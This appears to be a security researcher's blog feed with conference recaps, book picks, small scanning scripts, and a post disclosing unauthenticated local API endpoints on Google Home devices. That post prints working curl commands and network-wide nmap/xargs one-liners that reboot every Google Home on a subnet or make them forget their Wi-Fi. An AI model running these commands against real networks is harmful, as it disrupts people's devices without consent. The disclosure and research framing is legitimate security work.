Researcher. Builder. Hacker. Traveler.
Recently I have been working on a project to use the Trivy container scanner to scan large swath of containers for open vulnerabilities that I wanted to quickly post here. There is a full blog about the project here on the Kenna site.
Here are some of the pages I have built out so far:
As always reach out to me on twitter if you have any questions.
I had the chance to attend LoCoMoCoSec this year and had a fantastic time. It was a well-run conference that was extremely focused on being friendly for families and being inclusive of the diverse group of people who make up our community.
It also doesn’t hurt that it was in one of the most beautiful places I have ever seen.
Many of the attendees and speakers had brought their families with them, and this helped the conference have a fantastic family feel to it.
The organizers decided to keep the inclusiveness going by only offering a cash bar and asking anyone who was planning on over drinking to please move to another bar.
LoCoMoCoSec is the only conference I have attended that is hyper-focused on real-world product security. With talk after talk full of actionable or relatable stories that I will take back to work with me to help improve our security posture. I will highlight some of the key takeaways I will be bringing back to work with me.
Neil and Adam both had amazing presentations on open source security and I had a ton of conversations with people around the subject at this conference.
Neil talked about how Github struggled with getting from an out of date forked version of Rails to the latest current version. It was one of those rare talks where the presenter was open and honest about how hard it was to get up to date even in a technology company. I am looking forward to this presentation video being uploaded to share with my dev teams.
Adam from NPM talked about framework security and how little code is actually written in modern node apps. This slide shows that 97% of modern node apps are made up of underlying frameworks was one of the most talked about at the conference.
Outside of these talks, I spent a lot of time talking with people about how we can better understand and help the security of the many open source frameworks that companies build their applications on. This is a problem that everyone is obviously thinking about but no one has found an answer to yet.
I saw three really good talks about DevSecOps from James Wickett, Tanya Janca, and Dave Lindner all of who I really respect as leaders in our industry. They each had a very unique approach to this topic but they all ended up with DevSecOps is really hard and we all have a lot of work left to do. I have some thoughts on this topic and am working on a talk that I am hoping to be able to share later this summer.
James Wickett talk was one of the most entertaining of the conference, and he is writing a DevSecOps book that he is looking for material for. You can check out his slide deck here that includes contact information.
Tanya Janca is a high energy presenter and talked about the DevSecOps in sprints. She also talked about how great organizations have a ratio of 100 Devs to 10 Ops to 1 security person.
David Lindner who works at Contrast and is a friend of mine talked on Friday about the challenges of adapting appsec at a startup and balancing that with business needs. I empathized with him as we both come from startups of about the same size.
Bug Bounties are always a touchy subject at these conferences but there was a bunch of great discussions around them and how to improve them to make them more actionable.
Google in their talk about fixing CSP talked about 75% of their web payouts are for XSS bugs and how they are working on fixing that.
Katie Moussouris gave a talk about how bug bounties work and my biggest take away from her talk was that there is likely less than 500 bug bounty hunters who find the majority of all bugs.
Matt Langlois put together an amazing collabrtive CTF for the last day of the confrence and open sourced all the puzzles.
Melanie Ensign from Uber put together an amazing Dive Track with the ability for people to take a few hours and explore some of the best diving in the world. I took a morning and went out for an amazing drive.
Overall I had an amazing time and I didn’t talk to anyone who wasn’t looking forward to LoCoMoCoSec 20202. I know if at all possible I will be going back. 🤙
With the 2019 RSA Conference fastly approaching I thought I would take a few minutes and put together a quick list of what I am excited to see this year.
Did I miss something cool? If so, let me
Bundle Audit is a great tool to check if the Ruby Gems used in your project have any known vulnerabilities. Most DevOps teams I know run this tool against their builds in their CI/CD process when deploying. This can mean that code that is not updated often can have vulnerable gems unless you have a way to continually monitor your projects.
I spent some time looking at a few solutions this week and I thought I might be able to do this with a crappy shell script™ and the GitHub API. So, this morning while watching cartoons (The new Carmen San Deigo series is excellent.) I wrote this:
After you grab a github token and update the scirpt, running it is as simple as:
./bundleauditgithub.sh OrgToTestSince I was watching Netflix while writing this tool I decided to use them since they run a great bounty program on
Their ruby repos where all up to date outside of Workflowable which they have archived but it makes a good example. Here are complete findings for that repo.
Overall this turned out to be a fairly simple project that I will get a lot of use out of.
If you have any questions let me know twitter at @jgamblin.
I have developed a bad habit of picking up vanity domain names and not really doing much with them. Last month at AWS Re:Invent I picked up ServerlessSecurity.org and really wanted to do something with it but didn’t feel like maintaining, or paying for, a VPS so after doing some looking around I found that is was possible to point a custom domain to Github pages.
The documentation they provide is a little lacking, so I figured I would put together a small how to for anyone who wants to do this for themselves.
DNS configuration is pretty straightforward. You want to add the following IP addresses to your custom resource records.
185.199.108.153
185.199.109.153
185.199.110.153
185.199.111.153
After you configure your repo and update you DNS settings within 15 minutes or so your website should be live.
This is a really such simple method of hosting a website I parked the rest of my vanity websites:
I hope this is helpful for other people looking to host a website quickly.
Here is a list of my favorite security books from 2018 if you are looking for that last minute gift or have some extra time around the holidays to catch up on some reading.
I just got The GCHQ Puzzle Book 2, and like the original, it has quickly become the book that I always have in my bag. It is full of amazingly challenging and thought-provoking problems. It is easily the best gift you can give the security geek in your life this year.
Cracking Codes with Python: An Introduction to Building and Breaking Ciphers was a great (re)introduction to python development and cryptography concepts. While fairly basic in some places this book will be one I give out to people for years to come.
Hands-On Security in DevOps: Ensure continuous security, deployment, and delivery is a great book that covers at a high level what goes into
Agile Application Security: Enabling Security in a Continuous Delivery Pipeline is a book that clearly explains how to make security work in an agile development environment. This book will be a must-read for security professionals for
Dawn of the Code War: America’s Battle Against Russia, China, and the Rising is a book by John Carlin that shows both how far the US Federal government has come and how far behind the rest of the world they are.
I spent this last week in Las Vegas attending AWS Re:Invent.
This event is mind-numbingly massive with classes happening at 4 or 5 hotels all over the strip. I personally spent over an hour every day on their (nice but extremely slow) shuttle buses between the MGM Grand, Aria and the Sands Expo Center.
It would be impossible to see everything at this conference so throughout the week I compiled a list of services I wanted to investigate more, and I thought I would share them below.
I had a great time this year and learned a ton. I am looking forward to playing with Security Hub and to finish reading the AWS Well-Architected Framework PDF soon.
I am disappointed that DeepRacer seems to be AWS just taking the DonkeyCar model and close sourcing it without mentioning the original project, even after they have had DonekyCars at the last 2
Lastly, I interested to see if security is deemphasized next year with the announcement of a security-focused conference called re:
I have started using the Burp Suite 2.0 beta full time recently, and some of the new features I knew I wanted to explore more was the API and the CI Integration.
This project is still in its *very* early stages, but if you want to play with what I have been working on below are directions to get started.
Download BurpIssues.sh to the folder where you have burp-ci-driver-v1.0.5beta.jar saved.
Edit the following fields in the script:
Github_Auth_Token="YourToken"
Github_Repo_URL=”YourRepo"
min_severity_burp="low" # Can Be Info|Low|Medium|HighOnce that is done, running the script is as simple as:
./BurpIssues.sh domainyouhavepermissiontoscan.tld
Reminder: This is a full burp scan and can take anywhere from 10 mintues to many hours to complete depending on how big the site is.
While I am just getting started with the CI tool, I was impressed that this only took 20 lines of shell code. I plan on building out a lot more functionality and error checking over the next few months.
If you have any
TL;DR: An undocumented API in Google home devices is easily exploitable.
This command will reboot any on your local network:
nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/rebootI have always been a fan of Google Products, so when they announced the Google Home Hub, I ordered one.
Once I got the Hub on my network I scanned it and it returned the following:
Nmap scan report for hub
Host is up (0.046s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
8008/tcp open http
8009/tcp open ajp13
8443/tcp open https-alt
9000/tcp open cslistener
10001/tcp open scp-config
I was surprised to see so many ports open so I started to do some research and found that these
After spending 15 or 20 minutes looking I found that you can reboot the hub with this unauthenticated curl command:
curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/rebootI tweeted what happens when you run that command:
After I was able to get the Hub to reboot I was hooked and gave up a few hours of sleep to do some research and ended up finding a bunch of “good” information (see reading list at bottom).
At the end of the night, I was extremely disappointed with the security of these devices especially coming from Google who I trust with so much of my data and is the driving force behind BeyondCorp.
I am going to dive directly into sharing some of the commands I have found and the output and will end by showing how a bad actor could use this API.
Pull Basic SSDP Information:
$ curl http://hub:8008/ssdp/device-desc.xml
<?xml version="1.0"?>
<root xmlns="urn:schemas-upnp-org:device-1-0">
<specVersion>
<major>1</major>
<minor>0</minor>
</specVersion>
<URLBase>http://hub:8008</URLBase>
<device>
<deviceType>urn:dial-multiscreen-org:device:dial:1</deviceType>
<friendlyName>Kitchen Display</friendlyName>
<manufacturer>Google Inc.</manufacturer>
<modelName>Google Home Hub</modelName>
<UDN>uuid:11111111-adac-2b60-2102-11111aa111a</UDN>
<iconList>
<icon>
<mimetype>image/png</mimetype>
<width>98</width>
<height>55</height>
<depth>32</depth>
<url>/setup/icon.png</url>
</icon>
</iconList>
<serviceList>
<service>
<serviceType>urn:dial-multiscreen-org:service:dial:1</serviceType>
<serviceId>urn:dial-multiscreen-org:serviceId:dial</serviceId>
<controlURL>/ssdp/notfound</controlURL>
<eventSubURL>/ssdp/notfound</eventSubURL>
<SCPDURL>/ssdp/notfound</SCPDURL>
</service>
</serviceList>
</device>
</root>
Pull The Eureka Infomation:
$ curl -s http://hub:8008/setup/eureka_info | jq
{
"bssid": "cc:be:59:8c:11:8b",
"build_version": "136769",
"cast_build_revision": "1.35.136769",
"closed_caption": {},
"connected": true,
"ethernet_connected": false,
"has_update": false,
"hotspot_bssid": "FA:8F:CA:9C:AA:11",
"ip_address": "192.168.1.1",
"locale": "en-US",
"location": {
"country_code": "US",
"latitude": 255,
"longitude": 255
},
"mac_address": "11:A1:1A:11:AA:11",
"name": "Hub Display",
"noise_level": -94,
"opencast_pin_code": "1111",
"opt_in": {
"crash": true,
"opencast": true,
"stats": true
},
"public_key": "Removed",
"release_track": "stable-channel",
"setup_state": 60,
"setup_stats": {
"historically_succeeded": true,
"num_check_connectivity": 0,
"num_connect_wifi": 0,
"num_connected_wifi_not_saved": 0,
"num_initial_eureka_info": 0,
"num_obtain_ip": 0
},
"signal_level": -60,
"ssdp_udn": "11111111-adac-2b60-2102-11111aa111a",
"ssid": "SSID",
"time_format": 2,
"timezone": "America/Chicago",
"tos_accepted": true,
"uma_client_id": "1111a111-8404-437a-87f4-1a1111111a1a",
"uptime": 25244.52,
"version": 9,
"wpa_configured": true,
"wpa_id": 0,
"wpa_state": 10
}Run A Simple Speedtest:
$ curl -Lv -H Content-Type:application/json --data-raw '{ "url": "https://storage.googleapis.com/reliability-speedtest/random.txt" }' http://hub:8008/setup/test_internet_download_speedReboot The System:
$ curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://hub:8008/setup/reboot
* Trying hub...
* TCP_NODELAY set
* Connected to hub (hub) port 8008 (#0)
> POST /setup/reboot HTTP/1.1
> Host: hub:8008
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Type:application/json
> Content-Length: 16
>
* upload completely sent off: 16 out of 16 bytes
< HTTP/1.1 200 OK
< Access-Control-Allow-Headers:Content-Type
< Cache-Control:no-cache
< Content-Length:0
<
* Connection #0 to host hub left intactList Currently Configured Network:
$ curl http://hub:8008/setup/configured_networks
[{"ssid":"ssid","wpa_auth":7,"wpa_cipher":4,"wpa_id":0}]Delete The Current Configured Network:
curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://hub:8008/setup/forget_wifi
* Trying hub...
* TCP_NODELAY set
* Connected to hub (hub) port 8008 (#0)
> POST /setup/forget_wifi HTTP/1.1
> Host: hub:8008
> User-Agent: curl/7.54.0
> Accept: */*
> Content-Type:application/json
> Content-Length: 15
>
* upload completely sent off: 15 out of 15 bytes
This command basically makes the device unusable until you manually reconfigure it using the Google Home application:
Scan For Wireless Networks:
$ curl -X POST http://hub:8008/setup/scan_wifiList Scan Results:
$ curl http://192.168.1.55:8008/setup/scan_results | jq
[
{
"ap_list": [
{
"bssid": "11:11:11:11:11:11",
"frequency": 2462,
"signal_level": -72
}
],
"bssid": "11:11:11:11:11:11",
"signal_level": -72,
"ssid": "SSID",
"wpa_auth": 7,
"wpa_cipher": 4
},
{
"ap_list": [
{
"bssid": "11:11:11:11:11:11",
"frequency": 2412,
"signal_level": -81
}
],
"bssid": "11:11:11:11:11:11",
"signal_level": -81,
"ssid": "SSID2",
"wpa_auth": 7,
"wpa_cipher": 4
},
{
"ap_list": [
{
"bssid": "11:11:11:11:11:11",
"frequency": 2462,
"signal_level": -77
}
],
"bssid": "11:11:11:11:11:11",
"signal_level": -77,
"ssid": "You_Get_The_Idea",
"wpa_auth": 7,
"wpa_cipher": 4
},
]List Alarms and Timers:
$ curl http://hub:8008/setup/assistant/alarmsDisable All Notifcations:
$ curl -Lv -H Content-Type:application/json --data-raw '{ "notifications_enabled": true }' http://hub:8008/setup/assistant/notificationsSince none of these endpoints require authentication being malicious on a network with these present is trivial.
This code will reboot all Google Home devices on the network:
nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/\(|\)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{"params":"now"}' http://%:8008/setup/rebootThis code will delete the wireless network from every Google Home on the network causing a manual
nmap --open -p 8008 192.168.1.0/24 | awk '/is up/ {print up}; {gsub (/(|)/,""); up = $NF}' | xargs -I % curl -Lv -H Content-Type:application/json --data-raw '{ "wpa_id": 0 }' http://%:8008/setup/forget_wifiI am genuinely shocked by how poor the overall security of these devices are, even more so when you see that these endpoints have been known for years and relatively well documented.
I usually would have worked directly with Google to report these issues if they had not previously been disclosed, but due to the sheer amount of prior work online and committed code in their own codebase, it is obvious they know.
The new rest API in Burp 2.0 it is going to be amazing but it will allow things like this 9 line shell script I wrote this morning that will grab all public bounty sites from @arkadiyt’s bounty-targets-data repo and kick off a full scan.
https://gist.github.com/jgamblin/c22c0791af7572280d7fd569141650fe
I almost didn’t post this blog because I *think* this script is, in general, a bad idea and will likely lead to frivolous bounty reports and excessive traffic to these sites but if there is going to be an API people will abuse use it.